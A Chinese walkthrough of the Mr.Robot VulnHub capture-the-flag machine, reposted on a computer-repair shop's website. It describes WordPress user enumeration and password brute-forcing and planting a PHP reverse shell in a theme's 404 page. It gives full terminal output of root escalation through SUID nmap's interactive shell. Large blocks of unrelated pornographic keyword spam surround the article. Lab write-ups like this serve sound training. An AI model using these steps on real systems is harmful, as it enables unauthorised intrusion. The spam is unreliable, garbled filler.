国产精品久av福利在线观看_亚洲一区国产精品_亚洲黄色一区二区三区_欧美成人xxxx_国产精品www_xxxxx欧美_国产精品久久婷婷六月丁香_国产特级毛片

錦州市廣廈電腦維修|上門維修電腦|上門做系統|0416-3905144熱誠服務,錦州廣廈維修電腦,公司IT外包服務
topFlag1 設為首頁
topFlag3 收藏本站
 
maojin003 首 頁 公司介紹 服務項目 服務報價 維修流程 IT外包服務 服務器維護 技術文章 常見故障
錦州市廣廈電腦維修|上門維修電腦|上門做系統|0416-3905144熱誠服務技術文章
拿到主機root權限,Mr.Robot靶機實戰演練

作者: 佚名  日期:2018-06-29 19:59:07   來源: 本站整理

 前言

靶機主題來自美劇《黑客軍團》,這是一部傳達極客精神和黑客文化的上佳作品,不同于《硅谷》的搞笑風格,這部劇的主角Eliot患有精神分裂,整部劇的情節都較為壓抑,有點類似于電影《搏擊俱樂部》中雙重人格的斗爭。
雖然有影視色彩的加成,但是劇中的黑客技術細節還是足夠真實的,起碼符合常規的入侵滲透思路,強烈推薦該劇。
本次靶機有三個flag,難度在初級到中級,非常適合新手訓練學習,不需要逆向技術,目標就是找到三個key,并且拿到主機root權限。

 
環境配置
靶機下載地址:https://www.vulnhub.com/entry/mr-robot-1,151/
我使用的是VMware,導入ova文件,NAT方式連接后靶機自動獲取IP
本次實戰:
靶機IP:192.168.128.142
攻擊機IP:192.168.128.106
 
實戰演練
nmap開路,IP發現:

端口發現,服務版本探測:
nmap -sV -O 192.168.128.142

開啟了三個端口,發現web端口:80,443


查看源碼沒有發現可用信息,用dirb跑目錄:


發現有robots.txt文件,訪問http://192.168.128.142/robots.txt

發現兩個文件,訪問發現第一個目錄里是一個密碼字典,第二個像是一個密碼哈希,這是第一個key
073403c8a58a1f80d943455fb30724b9



密碼哈希無法爆破,字典也先放著后面用,現在用nikto掃描,看看有沒有可用漏洞:

發現有wordpress服務,之前dirb掃目錄也發現了wordpress登錄頁面
http://192.168.128.142/wp-login

發現wordpress服務,用wpscan掃描網站,只有登錄頁面,并沒有發現什么可用漏洞

在登錄頁面隨便輸入之前字典中的用戶,發現可以枚舉用戶名:

用burp枚舉出了兩個用戶名:

用elloit作為用戶名,再掛上這個字典跑密碼:

跑了好久,終于跑出密碼:ER28-0652,字典實在太大了,對字典做了篩選為了截圖方便就把重新跑了一遍

接下來就是獲取權限了,登陸之后,依次點擊apperance>editor>404.php

在kali找到php-reverse-shell.php,將其覆蓋到404.php更改監聽端口,IP


攻擊機上監聽此端口,訪問http://192.168.128.142/234543658,任意不存在頁面觸發shell

執行 python -c ‘import pty; pty.spawn(“/bin/bash”)’ 獲得一個更加穩定的shell

接下來查看靶機密碼文件:

發現沒法利用,先放一放。再看看其他目錄,找到一個密碼的md5散列.

拿出來破解:https://hashkiller.co.uk/md5-decrypter.aspx
abcdefghijklmnopqrstuvwxyz

用得到的密碼登錄robot

拿到第二個key,并且又拿到一個加密哈希,估計這個是root用戶的密碼
提升權限,但是沒有成功,只能想別的辦法
最后找到一個辦法,用nmap執行root權限

nmap產生了一個root權限的新shell


代碼如下:
daemon@linux:/$ su robot
su robot
Password: abcdefghijklmnopqrstuvwxyz
robot@linux:/$ id
id
uid=1002(robot) gid=1002(robot) groups=1002(robot)
robot@linux:/$ pwd
pwd
/
robot@linux:/$ cd /home
cd /home
robot@linux:/home$ ls
ls
robot
robot@linux:/home$ cd robot
cd robot
robot@linux:~$ ls
ls
key-2-of-3.txt password.raw-md5
robot@linux:~$ cat key-2-of-3.txt
cat key-2-of-3.txt
822c73956184f694993bede3eb39f959
robot@linux:~$ cat password.raw-md5
cat password.raw-md5
robot:c3fcd3d76192e4007dfb496cca67e13b
robot@linux:~$ find / -user root -perm -4000 2>/dev/null
find / -user root -perm -4000 2>/dev/null
/bin/ping
/bin/umount
/bin/mount
/bin/ping6
/bin/su
/usr/bin/passwd
/usr/bin/newgrp
/usr/bin/chsh
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/sudo
/usr/local/bin/nmap
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/lib/vmware-tools/bin32/vmware-user-suid-wrapper
/usr/lib/vmware-tools/bin64/vmware-user-suid-wrapper
/usr/lib/pt_chown
robot@linux:~$ /usr/local/bin/nmap —version
/usr/local/bin/nmap —version
nmap version 3.81 ( http://www.insecure.org/nmap/ )
robot@linux:~$ nmap —interactive
nmap —interactive
Starting nmap V. 3.81 ( http://www.insecure.org/nmap/ )
Welcome to Interactive Mode — press h  for help
nmap> !whoami
!whoami
root
waiting to reap child : No child processes
nmap> !bash -p
!bash -p
bash-4.3# whoami
whoami
root
bash-4.3# cd /root
cd /root
bash-4.3# ls -al
ls -al
total 32
drwx——— 3 root root 4096 Nov 13 2015 .
drwxr-xr-x 22 root root 4096 Sep 16 2015 ..
-rw———- 1 root root 4058 Nov 14 2015 .bash_history
-rw-r—r— 1 root root 3274 Sep 16 2015 .bashrc
drwx——— 2 root root 4096 Nov 13 2015 .cache
-rw-r—r— 1 root root 0 Nov 13 2015 firstboot_done
-r———— 1 root root 33 Nov 13 2015 key-3-of-3.txt
-rw-r—r— 1 root root 140 Feb 20 2014 .profile
-rw———- 1 root root 1024 Sep 16 2015 .rnd
bash-4.3# cat key-3-of-3.txt
cat key-3-of-3.txt
04787ddef27c3dee1ee161b21670b4e4
bash-4.3# ls
ls
firstboot_done key-3-of-3.txt
成功拿到第三個key:
04787ddef27c3dee1ee161b21670b4e4
拿到靶機root權限,game over。
 
總結
這個靶機的難度并不大,遇到的難點:
1.使用 python -c ‘import pty; pty.spawn(“/bin/bash”)’ 可以獲得一個穩定的shell,這個在實際滲透中用處也很大
2.用了很多辦法,一直拿不到root權限,查了很多資料發現了nmap自帶的提權腳本,這個技能get
3.這個靶機只開了web端口,ssh應該也是可以觸發的,大牛們可以嘗試
4.思路就是通過web頁面漏洞拿下了整個主機,wp提權思路也很多,大家也可以換思路滲透
 


熱門文章
  • 機械革命S1 PRO-02 開機不顯示 黑...
  • 聯想ThinkPad NM-C641上電掉電點不...
  • 三星一體激光打印機SCX-4521F維修...
  • 通過串口命令查看EMMC擦寫次數和判...
  • IIS 8 開啟 GZIP壓縮來減少網絡請求...
  • 索尼kd-49x7500e背光一半暗且閃爍 ...
  • 樓宇對講門禁讀卡異常維修,讀卡芯...
  • 新款海信電視機始終停留在開機界面...
  • 常見打印機清零步驟
  • 安裝驅動時提示不包含數字簽名的解...
  • 共享打印機需要密碼的解決方法
  • 圖解Windows 7系統快速共享打印機的...
  • 錦州廣廈電腦上門維修

    報修電話:13840665804  QQ:174984393 (聯系人:毛先生)   
    E-Mail:174984393@qq.com
    維修中心地址:錦州廣廈電腦城
    ICP備案/許可證號:遼ICP備2023002984號-1
    上門服務區域: 遼寧錦州市區
    主要業務: 修電腦,電腦修理,電腦維護,上門維修電腦,黑屏藍屏死機故障排除,無線上網設置,IT服務外包,局域網組建,ADSL共享上網,路由器設置,數據恢復,密碼破解,光盤刻錄制作等服務

    技術支持:微軟等
    一个人在线视频免费观看www| 激情综合网av| 奇米影视一区二区三区| 成人午夜视频福利| 亚洲欧美日韩国产另类专区| 欧美日韩一区二区免费视频| 欧美日韩免费高清一区色橹橹| 亚洲国产日韩欧美在线动漫| 欧美极品美女视频网站在线观看免费| 欧美视频一区二区三区四区| 亚洲午夜激情免费视频| 国产成人中文字幕| 日韩三级在线播放| 久久www免费人成精品| 男人添女人下部高潮视频在观看| 国产精品333| 久久国产柳州莫菁门| 一级一级黄色片| 九色精品高清在线播放| 国产91久久久久蜜臀青青天草二| 大桥未久在线播放| 精品国产99| 国产精品一区二区三区99| 一区二区三区四区av| 亚洲精品理论电影| 国产这里只有精品| 欧美这里只有精品| 一级性生活毛片| 国产三级小视频| 可以在线看的av| 1024在线播放| 日韩黄色大片| 91视视频在线观看入口直接观看www| 色狠狠桃花综合| 久久久免费av| www.69av| 中文字幕av播放| 青春娱乐分类视频精品2动漫| 蜜桃专区在线| 亚洲毛片在线免费| 日韩av电影一区| 欧美性xxxx18| 欧美亚洲激情在线| 青青草国产精品视频| 91香蕉视频污在线观看| 一本一本久久a久久综合精品蜜桃| 翔田千里一区| 日本一区福利在线| 97精品视频在线观看自产线路二| 日韩三级高清在线| 亚洲一区制服诱惑| 久久艹这里只有精品| 亚洲综合久久网| 99re99| 向日葵视频成人app网址| 国产精品一卡| 在线免费观看日本一区| 国产精品狼人色视频一区| 黄色av免费在线播放| 樱花视频在线免费观看| 深夜爽爽视频| 日韩高清一级| 国产精品久久99| 欧美精品videosex牲欧美| av磁力番号网| 在线观看中文字幕视频| 黄页在线播放| 美女主播精品视频一二三四| www.欧美.com| 最近中文字幕日韩精品| 男人草女人视频| 日韩手机在线视频| 在线欧美一级视频| 围产精品久久久久久久| 亚洲国产sm捆绑调教视频 | 国产午夜性春猛交ⅹxxx| 色综合视频一区二区三区44| 国产美女自拍| 亚洲精品电影院| 日产中文字幕在线精品一区| 亚洲免费观看高清完整版在线观看熊 | 2019中文字幕视频| 亚洲欧洲精品在线观看| 久久精品综合| 亚洲四虎av| 美女黄色免费看| 亚洲欧美欧美一区二区三区| 2021中文字幕在线| 国产情侣av自拍| 91污在线观看| 在线激情av| 国产精选第一页| 久久国产欧美精品| 秋霞av亚洲一区二区三| 好看的视频你懂的| 男人添女人下面免费视频| 国产精品三级av| 免费永久视频| 女人高潮一级片| 日韩亚洲国产中文字幕| thepron国产精品| 136福利精品导航| 91短视频在线观看| 国产一区二区视频免费观看 | 国产精品盗摄一区二区三区| 伊人手机在线| 国产精品久久久久久久久久久久久久久久久久 | 黄色性生活一级片| 成人午夜黄色影院| 色先锋资源久久综合| www.九色在线| 日本熟妇一区二区三区| 国产精品果冻传媒潘| 欧美视频日韩视频在线观看| 又黄又www的网站| 99久久99精品| 国产精品一区二区三区成人| 亚洲va欧美va人人爽午夜| 亚洲一区网站| 久草成人资源| 色猫猫成人app| 黄色毛片在线看| 中文在线字幕在线观看| 久久国产高清视频| 日韩在线综合网| 久久青草福利网站| 91蝌蚪porny九色| 91国内在线| 国产精品在线| 成人在线手机视频| 免费精品视频一区| 国产丝袜一区二区三区| 亚洲日本欧美| 一区二区三区性视频| 欧美日韩综合一区二区| 亚洲综合网中心| 国产精品久久视频| 无码av中文一区二区三区桃花岛| 正在播放日韩精品| 污视频在线看| 一区二区日韩在线观看| 免费久久久久久| ●精品国产综合乱码久久久久| 国产精品羞羞答答在线观看| 日本蜜桃在线观看视频| 亚洲欧洲成人| 性生大片免费观看性| jizzjizzjizz亚洲女| 黄色成人av| 尤物网站在线| 蜜桃视频在线观看网站| 9国产精品视频| 污污网站免费观看| 欧美性猛交xxxx乱大交| 国产一区二三区好的| 四虎国产精品免费久久5151| 天天摸在线视频| 一级一级黄色片| 国产精品无码一区二区三区免费| 中文字幕欧美日韩一区二区| 日韩精品免费电影| 国产成人丝袜美腿| 大胆人体一区| 色吊丝在线永久观看最新版本| 午夜视频在线播放| 懂色av蜜臀av粉嫩av永久| 国产又粗又猛又爽又黄的网站| 最新国产精品拍自在线播放| 国产亚洲欧洲一区高清在线观看| 亚洲国产老妈| 不卡视频观看| 成人mm视频在线观看| 成人免费影院| 你懂的在线观看| 日本特黄a级高清免费大片| 草民福利视频| 国产精选在线观看| 日韩女优一区二区| 国产精品v欧美精品∨日韩| 欧美贵妇videos办公室| 日本久久精品电影| 国产精品久久久久久久第一福利 | 国产三级做爰在线观看| eeuss影院www免费影院| 狠狠干天天干| 九色在线视频蝌蚪| h片精品在线观看| 男女在线视频| aaa在线免费观看| hd国产人妖ts另类视频| caoliu在线| 国产小视频免费在线网址| 三级免费网站| 美女啪啪无遮挡| 黄色网战入口| 嫩草研究院在线| 欧美著名女优| 麻豆app在线观看| 一级视频在线观看| 在线国产视频|